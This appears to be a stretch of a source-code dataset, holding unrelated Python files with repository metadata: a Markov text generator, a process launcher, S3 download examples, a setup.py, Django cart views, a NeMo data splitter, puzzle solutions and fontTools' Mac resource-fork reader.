    # erokov maps a (word, word) state to the list of observed successors.
    erokov = {}
    w1 = ""
    w2 = ""
    for word in wordlist:
        if w1 and w2:
            if (w1,w2) not in erokov:
                erokov[(w1,w2)] = []
            erokov[(w1,w2)].append(word)
        w1,w2 = w2, word
    count = 0
    sentence = ""
    # Random starting state.
    w1,w2 = random.choice(erokov.keys())
    while count < 11:
        try:
            tmp = random.choice(erokov[(w1,w2)])
            sentence += tmp
            w1,w2 = w2, tmp
            count += 1
        except KeyError:
            # NOTE(review): a dead-end state never advances `count`, so this
            # loop can spin printing "Error!" forever — confirm intent.
            print "Error!"
            pass
    print sentence
|
[
"tatsurotamashiro@gmail.com"
] |
tatsurotamashiro@gmail.com
|
f80e0eb67f0790a4fdf274aeb6c73eb6e9eec19b
|
cdc996370837c00003296556afdb33e2f2fee884
|
/devel_scripts/launcher.py
|
5237995d7e1aaac822ae3a4d546bf7b117644b25
|
[] |
no_license
|
capitaneanu/borunte_robot
|
1d4f14aadb2aa9e041ea0fdccc85d424cf155fb2
|
85e8765cbfae879f297c5254733a2dea48daeba0
|
refs/heads/master
| 2022-09-15T03:09:14.062484
| 2020-05-20T17:39:01
| 2020-05-20T17:39:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,218
|
py
|
# -*- coding: utf-8 -*-
import os
import shlex
import sys
import time
# Seconds between process-liveness polls (and after each launch).
TIMEOUT = 1.0
# Global registry of launched background commands.
processes = []  # type: List[sh.RunningCommand]
# Raised by check_processes() when any tracked child has exited.
class ProgramTerminated(Exception):
    pass
def check_pid(pid):
    """Return True if a process with the given unix pid exists."""
    # Signal 0 performs permission/existence checks without sending anything.
    try:
        os.kill(pid, 0)
        return True
    except OSError:
        return False
def start_process(command, line):
    """Launch `command` in the background with shell-split args from `line`,
    track it in the global `processes` list, then pause briefly.

    :type command: sh.Command
    """
    args = shlex.split(line)
    proc = command(args, _out=sys.stdout, _err=sys.stderr, _bg=True)
    processes.append(proc)
    time.sleep(TIMEOUT)
def terminate_processes():
    """Terminate and reap every tracked child process."""
    for proc in processes:
        if proc is None:
            continue
        # The process may already be gone; ignore the resulting OSError.
        try:
            proc.terminate()
        except OSError:
            pass
        proc.wait()
def check_processes():
    """Raise ProgramTerminated if any tracked process is no longer alive."""
    for proc in processes:
        if proc is not None and not check_pid(proc.pid):
            raise ProgramTerminated()
def wait_loop():
    """Poll the tracked processes until Ctrl-C or until one of them exits."""
    try:
        while True:
            check_processes()
            time.sleep(TIMEOUT)
    except KeyboardInterrupt:
        # Operator requested shutdown: exit quietly.
        pass
    except ProgramTerminated:
        print('A program terminated, stopping other processes.')
|
[
"mail@roessler.systems"
] |
mail@roessler.systems
|
15c9096c932868854571f4061ed0c3a68eec026e
|
6efc2eb23678741263da7ac6bd868a9f3a37d38b
|
/01.stock_investment/05.chart_analysis/test_boto3/test_s3_download.py
|
363a8247b52c0222ee245d335c3d2c697ee9f4c1
|
[] |
no_license
|
predora005/business-research
|
c6272b129353a302673cf8a13c1629b5ade4a50e
|
96743cc6a0b592c87e6d0f2de341fc3bbb3ef3b1
|
refs/heads/main
| 2023-06-18T08:08:24.537951
| 2021-07-22T04:19:09
| 2021-07-22T04:19:09
| 314,985,045
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
# coding: utf-8
import boto3
import tempfile
##################################################
# メイン
##################################################
if __name__ == '__main__':
    # Demo of the four boto3 download variants; the exact call sequence is
    # the point of the script. BUCKET_NAME must be filled in before running.
    BUCKET_NAME = ''
    OBJECT_NAME1 = 'dir1/file1.txt'
    FILE_NAME1 = 'file1.txt'
    OBJECT_NAME2 = 'dir1/file2.txt'
    FILE_NAME2 = 'file2.txt'
    OBJECT_NAME3 = 'dir2/file3.csv'
    FILE_NAME3 = 'file3.csv'
    OBJECT_NAME4 = 'dir2/file4.txt'
    FILE_NAME4 = 'file4.txt'

    ##############################
    # Variant 1: resource API, Bucket.download_file.
    s3 = boto3.resource('s3')
    s3.Bucket(BUCKET_NAME).download_file(OBJECT_NAME1, FILE_NAME1)

    ##############################
    # The download_file method
    # Variant 2: client API.
    s3 = boto3.client('s3')
    s3.download_file(BUCKET_NAME, OBJECT_NAME2, FILE_NAME2)

    ##############################
    # Variant 3: resource API, streaming into an open file object.
    s3 = boto3.resource('s3')
    bucket = s3.Bucket(BUCKET_NAME)
    with open(FILE_NAME3, 'wb') as f:
        bucket.download_fileobj(OBJECT_NAME3, f)

    ##############################
    # The download_fileobj method
    # Variant 4: client API, streaming into an open file object.
    s3 = boto3.client('s3')
    with open(FILE_NAME4, 'wb') as f:
    #with tempfile.NamedTemporaryFile(mode='wb') as f:
        s3.download_fileobj(BUCKET_NAME, OBJECT_NAME4, f)
        print(f.name)
        print(f.tell)
|
[
"46834065+predora005@users.noreply.github.com"
] |
46834065+predora005@users.noreply.github.com
|
624e6493ba366cde8a495ba0effb21374417bbd1
|
4d0213e588149b9fa86fbe35faea8657052d9254
|
/setup.py
|
27b1a3f4ad3e7c71aeb236803df30c35aed1ff6d
|
[
"Apache-2.0"
] |
permissive
|
Pyligent/gen-efficientnet-pytorch
|
1e492dec87fa33458e452472c65ed0f7afd1a876
|
b3bc163478737924f508978a6f0c96e07046e025
|
refs/heads/master
| 2020-12-14T15:51:36.930259
| 2019-10-30T22:31:10
| 2019-10-30T22:31:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,688
|
py
|
""" Setup
"""
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))

# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

# Load __version__ without importing the package (it may not be installed
# yet); standard setup.py idiom — the exec'd file is our own version.py.
exec(open('geffnet/version.py').read())

setup(
    name='geffnet',
    version=__version__,
    description='(Generic) EfficientNets for PyTorch',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/rwightman/gen-efficientnet-pytorch',
    author='Ross Wightman',
    author_email='hello@rwightman.com',
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Education',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Topic :: Scientific/Engineering',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',
        'Topic :: Software Development',
        'Topic :: Software Development :: Libraries',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],

    # Note that this is a string of words separated by whitespace, not a list.
    keywords='pytorch pretrained models efficientnet mixnet mobilenetv3 mnasnet',
    packages=find_packages(exclude=['data']),
    install_requires=['torch >= 1.1', 'torchvision'],
    python_requires='>=3.6',
)
|
[
"rwightman@gmail.com"
] |
rwightman@gmail.com
|
e3fccd35bcac0946969cbb7de0a9f8057ab2c8ee
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/BsPlanInviteConfig.py
|
f6e1ed05d6ca34d93fd5c47f5c13a9c375717bbe
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,362
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class BsPlanInviteConfig(object):
    """Alipay SDK value object for a plan-invite time window (generated style:
    private fields, properties, and dict <-> object converters)."""

    def __init__(self):
        self._end_time = None
        self._start_time = None

    @property
    def end_time(self):
        return self._end_time

    @end_time.setter
    def end_time(self, value):
        self._end_time = value

    @property
    def start_time(self):
        return self._start_time

    @start_time.setter
    def start_time(self, value):
        self._start_time = value

    def to_alipay_dict(self):
        """Serialize to the wire dict, recursing into nested SDK objects."""
        params = dict()
        if self.end_time:
            if hasattr(self.end_time, 'to_alipay_dict'):
                params['end_time'] = self.end_time.to_alipay_dict()
            else:
                params['end_time'] = self.end_time
        if self.start_time:
            if hasattr(self.start_time, 'to_alipay_dict'):
                params['start_time'] = self.start_time.to_alipay_dict()
            else:
                params['start_time'] = self.start_time
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an instance from a wire dict; returns None for empty input."""
        if not d:
            return None
        o = BsPlanInviteConfig()
        if 'end_time' in d:
            o.end_time = d['end_time']
        if 'start_time' in d:
            o.start_time = d['start_time']
        return o
|
[
"jishupei.jsp@alibaba-inc.com"
] |
jishupei.jsp@alibaba-inc.com
|
3ecd4acf486810b559bb1eb756b9b32e70f99558
|
f05084e33f189c3ca16982a6704fa808831fa71a
|
/yayo/cart/views.py
|
5009693a7231de1285c2d32c1e33dd096dbdca83
|
[] |
no_license
|
willyowi/Yayo-maluku-shop
|
f7581ae4c5ca0a1dc6a9daa92701d0965d27914c
|
7c8844bd3cbd97fdac01f991b45ca55b5f419c38
|
refs/heads/master
| 2021-01-06T16:06:36.397007
| 2020-02-18T15:20:46
| 2020-02-18T15:20:46
| 241,390,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 890
|
py
|
from django.shortcuts import render,redirect,get_object_or_404
from django.views.decorators.http import require_POST
from shop.models import Product
from .cart import Cart
from .forms import CartAddProductForm
# Create your views here.
@require_POST
def cart_add(request, product_id):
    """Add a product to the session cart (POST only), then show the cart."""
    cart = Cart(request)
    product = get_object_or_404(Product, id=product_id)
    form = CartAddProductForm(request.POST)
    if form.is_valid():
        data = form.cleaned_data
        cart.add(product=product,
                 quantity=data['quantity'],
                 update_quantity=data['update'])
    # NOTE(review): an invalid form is silently ignored and we still redirect.
    return redirect('cart:cart_detail')
def cart_remove(request, product_id):
    """Remove a product from the session cart, then show the cart."""
    cart = Cart(request)
    item = get_object_or_404(Product, id=product_id)
    cart.remove(item)
    return redirect('cart:cart_detail')
def cart_detail(request):
    """Render the current session cart."""
    context = {'cart': Cart(request)}
    return render(request, 'cart/detail.html', context)
|
[
"wilsonowino1@gmail.com"
] |
wilsonowino1@gmail.com
|
a30781f84b1feca4e4a793f1a648138952c65940
|
b2cefb7a2a83aa93ee1b15a780b5ddf6c498215b
|
/examples/nlp/duplex_text_normalization/data/data_split.py
|
3b053a34419980bc0351c55707a288cbdab02f16
|
[
"Apache-2.0"
] |
permissive
|
VahidooX/NeMo
|
bfde8c9b48c818342a9c6290fb9dee62fafeca38
|
866cc3f66fab3a796a6b74ef7a9e362c2282a976
|
refs/heads/main
| 2023-07-23T19:13:39.948228
| 2022-04-29T21:51:54
| 2022-04-29T21:51:54
| 227,733,473
| 1
| 2
|
Apache-2.0
| 2022-09-15T15:30:13
| 2019-12-13T01:55:21
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,238
|
py
|
# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script creates data splits of the Google Text Normalization dataset
of the format mentioned in the `text_normalization doc <https://github.com/NVIDIA/NeMo/blob/main/docs/source/nlp/text_normalization.rst>`.
USAGE Example:
1. Download the Google TN dataset from https://www.kaggle.com/google-nlu/text-normalization
2. Unzip the English subset (e.g., by running `tar zxvf en_with_types.tgz`). Then there will a folder named `en_with_types`.
3. Run this script
# python data_split.py \
--data_dir=en_with_types/ \
--output_dir=data_split/ \
--lang=en
In this example, the split files will be stored in the `data_split` folder.
The folder should contain three subfolders `train`, 'dev', and `test` with `.tsv` files.
"""
from argparse import ArgumentParser
from os import listdir, mkdir
from os.path import isdir, isfile, join
from tqdm import tqdm
from nemo.collections.nlp.data.text_normalization import constants
# Local Constants
TEST_SIZE_EN = 100002
TEST_SIZE_RUS = 100007
def read_google_data(data_file: str, lang: str, split: str):
    """
    The function can be used to read the raw data files of the Google Text Normalization
    dataset (which can be downloaded from https://www.kaggle.com/google-nlu/text-normalization)

    Args:
        data_file: Path to the data file. Should be of the form output-xxxxx-of-00100
        lang: Selected language.
        split: data split
    Return:
        data: list of examples, each a (classes, tokens, outputs) triple of
        parallel lists covering one sentence
    """
    data = []
    cur_classes, cur_tokens, cur_outputs = [], [], []
    with open(data_file, 'r', encoding='utf-8') as f:
        for linectx, line in tqdm(enumerate(f)):
            es = line.strip().split('\t')
            if split == "test":
                # For the results reported in the paper "RNN Approaches to Text Normalization: A Challenge":
                # + For English, the first 100,002 lines of output-00099-of-00100 are used for the test set
                # + For Russian, the first 100,007 lines of output-00099-of-00100 are used for the test set
                if lang == constants.ENGLISH and linectx == TEST_SIZE_EN:
                    break
                if lang == constants.RUSSIAN and linectx == TEST_SIZE_RUS:
                    break
            # An "<eos>" marker line closes the current sentence.
            if len(es) == 2 and es[0] == '<eos>':
                data.append((cur_classes, cur_tokens, cur_outputs))
                # Reset
                cur_classes, cur_tokens, cur_outputs = [], [], []
                continue

            # Remove _trans (for Russian)
            if lang == constants.RUSSIAN:
                es[2] = es[2].replace('_trans', '')
            # Update the current example; lines are class<TAB>token<TAB>output.
            assert len(es) == 3
            cur_classes.append(es[0])
            cur_tokens.append(es[1])
            cur_outputs.append(es[2])
    return data
if __name__ == '__main__':
    parser = ArgumentParser(description='Preprocess Google text normalization dataset')
    parser.add_argument('--data_dir', type=str, required=True, help='Path to folder with data')
    parser.add_argument('--output_dir', type=str, default='preprocessed', help='Path to folder with preprocessed data')
    parser.add_argument(
        '--lang', type=str, default=constants.ENGLISH, choices=constants.SUPPORTED_LANGS, help='Language'
    )
    args = parser.parse_args()

    # Create the output dir (if not exist)
    if not isdir(args.output_dir):
        mkdir(args.output_dir)
        mkdir(args.output_dir + '/train')
        mkdir(args.output_dir + '/dev')
        mkdir(args.output_dir + '/test')

    for fn in sorted(listdir(args.data_dir))[::-1]:
        fp = join(args.data_dir, fn)
        if not isfile(fp):
            continue
        if not fn.startswith('output'):
            continue

        # Determine the current split: 00-89 train, 90-94 dev, 99 test.
        split_nb = int(fn.split('-')[1])
        if split_nb < 90:
            cur_split = "train"
        elif split_nb < 95:
            cur_split = "dev"
        elif split_nb == 99:
            cur_split = "test"
        else:
            # BUG FIX: files 95-98 previously fell through with cur_split
            # (and then data) left over from the previous iteration — or
            # unbound on the very first file. They belong to no split; skip.
            continue
        data = read_google_data(data_file=fp, lang=args.lang, split=cur_split)
        # write out
        output_file = join(args.output_dir, f'{cur_split}', f'{fn}.tsv')
        print(fp)
        print(output_file)
        output_f = open(output_file, 'w', encoding='utf-8')
        for inst in data:
            cur_classes, cur_tokens, cur_outputs = inst
            for c, t, o in zip(cur_classes, cur_tokens, cur_outputs):
                output_f.write(f'{c}\t{t}\t{o}\n')
            output_f.write('<eos>\t<eos>\n')
        print(f'{cur_split}_sentences: {len(data)}')
|
[
"noreply@github.com"
] |
VahidooX.noreply@github.com
|
b02a3215d5c955daec98e2db06f5171974b90720
|
05ec80585e500eb75baade82bada8f0c5a2a76dc
|
/Backtracking/GenerateIP.py
|
4b339410a665caec82a4815768bb4049c6a8bab4
|
[] |
no_license
|
NenadPantelic/GeeksforGeeks-Must-Do-Interview-preparation
|
24477da148d4b9fe8113f669f21984d081327563
|
180c6b1bc6a4b6e1b44c409c220368b391b672b8
|
refs/heads/master
| 2021-01-05T19:16:22.436554
| 2020-11-15T14:39:02
| 2020-11-15T14:39:02
| 241,113,139
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 25 21:19:12 2020
@author: nenad
"""
def is_valid(ip, pos, segments):
    """Return True when *ip* is a usable IPv4 segment starting at *pos*.

    A segment is usable when it is non-empty, within 0..255, has no
    leading zero (e.g. "03" is rejected but "0" is fine), and position
    *pos* has not already been consumed by another segment.
    """
    # "0x..." style segments such as "03" are not valid dotted-quad parts.
    no_leading_zero = not (len(ip) > 1 and ip[0] == "0")
    return (
        no_leading_zero
        and len(ip) > 0
        and 0 <= int(ip) <= 255
        and segments[pos] == False
    )
def genIP(string):
    """Find every valid IPv4 address formed by dotting *string*, then print them."""
    candidates = []
    length = len(string)
    # Tracks which start positions are already consumed by a chosen segment.
    used = [False] * length
    solve(string, length, 0, candidates, used, [])
    print(candidates)
def solve(string, n, pos, ips, segments, ip):
    """Backtracking helper: extend *ip* (list of segments) using string[pos:].

    Completed 4-segment candidates that consume the whole string are
    appended (dot-joined) to *ips*.
    """
    # ip has 4 parts -> candidate complete; record it only when the entire
    # string was consumed, then stop extending this branch.
    if len(ip) == 4:
        # if we reached the end of the string that we process
        if pos >= n:
            ips.append(".".join(ip))
        return
    # one part of ip has length from 1 to 3, both inclusive
    for i in range(1,min(4, n-pos+1)):
        # take substring as ip's quartette
        substr = string[pos:pos+i]
        # if ip is valid
        if is_valid(substr, pos,segments):
            # mark that char as used
            segments[pos] = True
            # check the rest of the string - can we form the rest of ip from that substring
            solve(string, n, pos+i, ips, segments, ip + [substr])
            # backtrack so other segment lengths can start here
            segments[pos] = False
    return
# Test 0: four ones -> only 1.1.1.1
string = "1111"
genIP(string)
# Test 1: five digits allow several 4-segment splits
string = "11211"
genIP(string)
# Test 2
string = "112112"
genIP(string)
# Test 3: splits producing segments above 255 must be rejected
string = "25500255"
genIP(string)
|
[
"nenadpantelickg@gmail.com"
] |
nenadpantelickg@gmail.com
|
540590ef128c7fc98cb5a28c475cbf774c51ff24
|
d96787f92bd86c8d8bcf01a4e7ec8f7feec24194
|
/kattis/nizovi/solution.py
|
9c70b792c4c93471dd6c04868b1338089c92b9f2
|
[] |
no_license
|
iandioch/solutions
|
133cbc3af58fadcde0b2e981fb0e7d05801070a7
|
8b3e458b3c01179ddf776bfbb897f263f22f3693
|
refs/heads/master
| 2023-04-09T03:39:16.952817
| 2023-03-15T20:00:53
| 2023-03-15T20:00:53
| 47,693,495
| 48
| 40
| null | 2019-10-22T14:52:59
| 2015-12-09T13:36:55
|
Python
|
UTF-8
|
Python
| false
| false
| 721
|
py
|
# Pretty-print a condensed "{...}" array literal from stdin with 2-space
# indentation, one value / brace per line.
s = input()
curr = ''      # characters accumulated since the last emitted line
indent = 0     # current indentation width in spaces
lines = []
for c in s:
    curr += c
    if curr == '{':
        # opening brace gets its own line and deepens what follows
        lines.append('{}{}'.format(' '*indent, c))
        curr = ''
        indent += 2
    elif curr.endswith('}') or curr.endswith('},'):
        d = curr.find('}')
        # flush any value text collected before the closing brace
        if len(curr[:d]) > 0:
            lines.append('{}{}'.format(' '*indent, curr[:d]))
        indent -= 2
        # the brace (and its trailing comma, if any) at the shallower indent
        lines.append('{}{}'.format(' '*indent, curr[d:]))
        curr = ''
    elif curr[-1] == ',':
        # a comma terminates a plain value
        lines.append('{}{}'.format(' '*indent, curr))
        curr = ''
# remove commas trailing after }s: a line holding only ',' is merged into
# the previous line
for j in range(len(lines)-1, -1, -1):
    if lines[j].strip() == ',':
        del lines[j]
        lines[j-1] += ','
print('\n'.join(lines))
|
[
"iandioch11@gmail.com"
] |
iandioch11@gmail.com
|
b632edb4abed10644c2eca37adee10ff3ebf2a1e
|
080397d0e6d573ef6d7eb9c2bc6b1b5787cfe0d1
|
/tests/twitter_learning_journal/builders/test_cache_path_builder.py
|
2dfeb176343ff67367981b17880cefdbe6d09dac
|
[
"Beerware"
] |
permissive
|
DEV3L/twitter-learning-journal
|
ecd0eb922e369b10fd6e039d652eed7078601139
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
refs/heads/master
| 2021-09-20T17:27:11.157096
| 2018-08-13T11:58:34
| 2018-08-13T11:58:34
| 114,556,953
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
py
|
from app.twitter_learning_journal.builders.cache_path_builder import build_cache_path
def test_build_cache_path():
    """build_cache_path nests the sub directory under the pickle tweet cache root."""
    cache_path = build_cache_path(sub_directory='test')
    assert cache_path == './data/pickle/tweets/test'
|
[
"jus.beall@gmail.com"
] |
jus.beall@gmail.com
|
dc9388fcc7ecf66dabb9bc64fe98c2f689c370d6
|
20176bf4fbd8aec139c7b5a27f2c2e155e173e6e
|
/data/all-pratic/Anusha Koila/print_odd_num.py
|
d290d9c8c6e77770c4fb451217c46810fd11629d
|
[] |
no_license
|
githubjyotiranjan/pytraining
|
4ac4a1f83cc4270e2939d9d32c705019c5bc61c5
|
8b50c4ab7848bd4cbfdfbc06489768d577289c66
|
refs/heads/master
| 2020-03-19T06:22:20.793296
| 2018-06-15T20:08:11
| 2018-06-15T20:08:11
| 136,013,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 337
|
py
|
# Print the odd numbers below a user-supplied limit.
#
# Bug fixes vs. the original:
#  * `except erro1:` referenced an undefined name, crashing with NameError
#    whenever input was not an integer; we catch ValueError (what int()
#    actually raises) instead.
#  * All the printing logic lived inside the except handler, so valid
#    input produced no output at all; it now runs on the success path.
#  * Negative input is rejected with a message rather than via a handler.
try:
    num = int(input("Enter an number :"))
except ValueError:
    # int() raises ValueError for non-numeric text
    print("Invalid input: please enter an integer")
else:
    if num < 0:
        print("Negative numbers not allowed")
    else:
        print("ODD numbers list :\n ")
        # step-2 range yields exactly the odd numbers below num
        for i in range(1, num, 2):
            print(i)
|
[
"jsatapathy007@gmail.com"
] |
jsatapathy007@gmail.com
|
93196c7e4c3d9aee7a600a779e6f089b06a181e0
|
13eae91d078c8b88c990bb6da1b9cdb8e3648b76
|
/cogs/Downloader/lib/fontTools/misc/macRes.py
|
e8b3cbc20ed28d5048adec1ba0a12c560f11c715
|
[] |
no_license
|
skylarr1227/skybizzle
|
98303c99a5ea897469e381e06dcda3725d6500d6
|
63c38995437d6880bd9bf0de52d406c904cbbd24
|
refs/heads/master
| 2023-05-13T00:12:46.827511
| 2019-11-12T01:03:45
| 2019-11-12T01:03:45
| 221,097,000
| 0
| 1
| null | 2023-05-07T06:22:44
| 2019-11-12T00:40:38
|
Python
|
UTF-8
|
Python
| false
| false
| 6,591
|
py
|
""" Tools for reading Mac resource forks. """
from fontTools.misc.py23 import *
import struct
from fontTools.misc import sstruct
from collections import OrderedDict
try:
from collections.abc import MutableMapping
except ImportError:
from UserDict import DictMixin as MutableMapping
class ResourceError(Exception):
    """Raised when a resource fork cannot be read or parsed."""
class ResourceReader(MutableMapping):
    """Mapping-style reader for Mac resource forks.

    Parses the resource header, type list and reference lists on
    construction and exposes the result as a mapping of resource type
    (4-character string) -> list of Resource objects.
    """

    def __init__(self, fileOrPath):
        # resType (str) -> list of Resource, preserving file order
        self._resources = OrderedDict()
        if hasattr(fileOrPath, 'read'):
            # already an open binary file-like object
            self.file = fileOrPath
        else:
            try:
                # try reading from the resource fork (only works on OS X)
                self.file = self.openResourceFork(fileOrPath)
                self._readFile()
                return
            except (ResourceError, IOError):
                # if it fails, use the data fork
                self.file = self.openDataFork(fileOrPath)
        self._readFile()

    @staticmethod
    def openResourceFork(path):
        # The "..namedfork/rsrc" suffix addresses the resource fork on macOS.
        if hasattr(path, "__fspath__"):  # support os.PathLike objects
            path = path.__fspath__()
        with open(path + '/..namedfork/rsrc', 'rb') as resfork:
            data = resfork.read()
        infile = BytesIO(data)
        infile.name = path
        return infile

    @staticmethod
    def openDataFork(path):
        # Read the regular file contents into an in-memory buffer.
        with open(path, 'rb') as datafork:
            data = datafork.read()
        infile = BytesIO(data)
        infile.name = path
        return infile

    def _readFile(self):
        # Parse header/map, then the per-type resource lists.
        self._readHeaderAndMap()
        self._readTypeList()

    def _read(self, numBytes, offset=None):
        # Read exactly numBytes (optionally after seeking), converting any
        # short read or bad offset into a ResourceError.
        if offset is not None:
            try:
                self.file.seek(offset)
            except OverflowError:
                raise ResourceError("Failed to seek offset ('offset' is too large)")
            if self.file.tell() != offset:
                raise ResourceError('Failed to seek offset (reached EOF)')
        try:
            data = self.file.read(numBytes)
        except OverflowError:
            raise ResourceError("Cannot read resource ('numBytes' is too large)")
        if len(data) != numBytes:
            raise ResourceError('Cannot read resource (not enough data)')
        return data

    def _readHeaderAndMap(self):
        # Unpack the fork header and the resource map header; sstruct
        # assigns the unpacked fields directly onto self.
        self.file.seek(0)
        headerData = self._read(ResourceForkHeaderSize)
        sstruct.unpack(ResourceForkHeader, headerData, self)
        # seek to resource map, skip reserved
        mapOffset = self.mapOffset + 22
        resourceMapData = self._read(ResourceMapHeaderSize, mapOffset)
        sstruct.unpack(ResourceMapHeader, resourceMapData, self)
        self.absTypeListOffset = self.mapOffset + self.typeListOffset
        self.absNameListOffset = self.mapOffset + self.nameListOffset

    def _readTypeList(self):
        # The stored count is one less than the actual number of entries.
        absTypeListOffset = self.absTypeListOffset
        numTypesData = self._read(2, absTypeListOffset)
        self.numTypes, = struct.unpack('>H', numTypesData)
        absTypeListOffset2 = absTypeListOffset + 2
        for i in range(self.numTypes + 1):
            resTypeItemOffset = absTypeListOffset2 + ResourceTypeItemSize * i
            resTypeItemData = self._read(ResourceTypeItemSize, resTypeItemOffset)
            item = sstruct.unpack(ResourceTypeItem, resTypeItemData)
            resType = tostr(item['type'], encoding='mac-roman')
            refListOffset = absTypeListOffset + item['refListOffset']
            numRes = item['numRes'] + 1
            resources = self._readReferenceList(resType, refListOffset, numRes)
            self._resources[resType] = resources

    def _readReferenceList(self, resType, refListOffset, numRes):
        # Decompile each fixed-size reference entry into a Resource.
        resources = []
        for i in range(numRes):
            refOffset = refListOffset + ResourceRefItemSize * i
            refData = self._read(ResourceRefItemSize, refOffset)
            res = Resource(resType)
            res.decompile(refData, self)
            resources.append(res)
        return resources

    # --- MutableMapping protocol: keyed by resource type string ---

    def __getitem__(self, resType):
        return self._resources[resType]

    def __delitem__(self, resType):
        del self._resources[resType]

    def __setitem__(self, resType, resources):
        self._resources[resType] = resources

    def __len__(self):
        return len(self._resources)

    def __iter__(self):
        return iter(self._resources)

    def keys(self):
        return self._resources.keys()

    @property
    def types(self):
        # List of resource types present, in file order.
        return list(self._resources.keys())

    def countResources(self, resType):
        """Return the number of resources of a given type."""
        try:
            return len(self[resType])
        except KeyError:
            return 0

    def getIndices(self, resType):
        # 1-based indices for the resources of resType (empty if none).
        numRes = self.countResources(resType)
        if numRes:
            return list(range(1, numRes+1))
        else:
            return []

    def getNames(self, resType):
        """Return list of names of all resources of a given type."""
        return [res.name for res in self.get(resType, []) if res.name is not None]

    def getIndResource(self, resType, index):
        """Return resource of given type located at an index ranging from 1
        to the number of resources for that type, or None if not found.
        """
        if index < 1:
            return None
        try:
            res = self[resType][index-1]
        except (KeyError, IndexError):
            return None
        return res

    def getNamedResource(self, resType, name):
        """Return the named resource of given type, else return None."""
        name = tostr(name, encoding='mac-roman')
        for res in self.get(resType, []):
            if res.name == name:
                return res
        return None

    def close(self):
        # Idempotent: safe to call after the underlying file is closed.
        if not self.file.closed:
            self.file.close()
class Resource(object):
    """A single Mac resource: its type, raw data, numeric id, name and attributes."""

    def __init__(self, resType=None, resData=None, resID=None, resName=None,
            resAttr=None):
        self.type = resType
        self.data = resData
        self.id = resID
        self.name = resName
        self.attr = resAttr

    def decompile(self, refData, reader):
        """Parse one reference-list entry and pull this resource's data and name
        out of *reader* (a ResourceReader)."""
        sstruct.unpack(ResourceRefItem, refData, self)
        # interpret 3-byte dataOffset as (padded) ULONG to unpack it with struct
        self.dataOffset, = struct.unpack('>L', bytesjoin([b"\0", self.dataOffset]))
        absDataOffset = reader.dataOffset + self.dataOffset
        dataLength, = struct.unpack(">L", reader._read(4, absDataOffset))
        self.data = reader._read(dataLength)
        if self.nameOffset == -1:
            # unnamed resource; self.name stays None
            return
        absNameOffset = reader.absNameListOffset + self.nameOffset
        # Pascal-style string: one length byte followed by the name bytes.
        nameLength, = struct.unpack('B', reader._read(1, absNameOffset))
        name, = struct.unpack('>%ss' % nameLength, reader._read(nameLength))
        self.name = tostr(name, encoding='mac-roman')
ResourceForkHeader = """
> # big endian
dataOffset: L
mapOffset: L
dataLen: L
mapLen: L
"""
ResourceForkHeaderSize = sstruct.calcsize(ResourceForkHeader)
ResourceMapHeader = """
> # big endian
attr: H
typeListOffset: H
nameListOffset: H
"""
ResourceMapHeaderSize = sstruct.calcsize(ResourceMapHeader)
ResourceTypeItem = """
> # big endian
type: 4s
numRes: H
refListOffset: H
"""
ResourceTypeItemSize = sstruct.calcsize(ResourceTypeItem)
ResourceRefItem = """
> # big endian
id: h
nameOffset: h
attr: B
dataOffset: 3s
reserved: L
"""
ResourceRefItemSize = sstruct.calcsize(ResourceRefItem)
|
[
"skylarr1227@gmail.comgit config --global user.email skylarr1227@gmail.com"
] |
skylarr1227@gmail.comgit config --global user.email skylarr1227@gmail.com
|
d4cb57f250e733e13d0676e9b5d25d710f3cafad
|
7f52bb7c3a5ed3be6821306137c5217362d06dc3
|
/manage.py
|
3b50f6ea9203cf02974bbf61451c2a74f68e4d63
|
[] |
no_license
|
payush/cristianoronaldoyopmailcom-307
|
547f36250cf3c9c94bdea0fe8c7a1e3e1194294a
|
d2f2a1f76ab354e391bab8a628782c80a3b1c97a
|
refs/heads/master
| 2020-03-23T14:24:53.428495
| 2018-07-20T06:44:00
| 2018-07-20T06:44:00
| 141,674,090
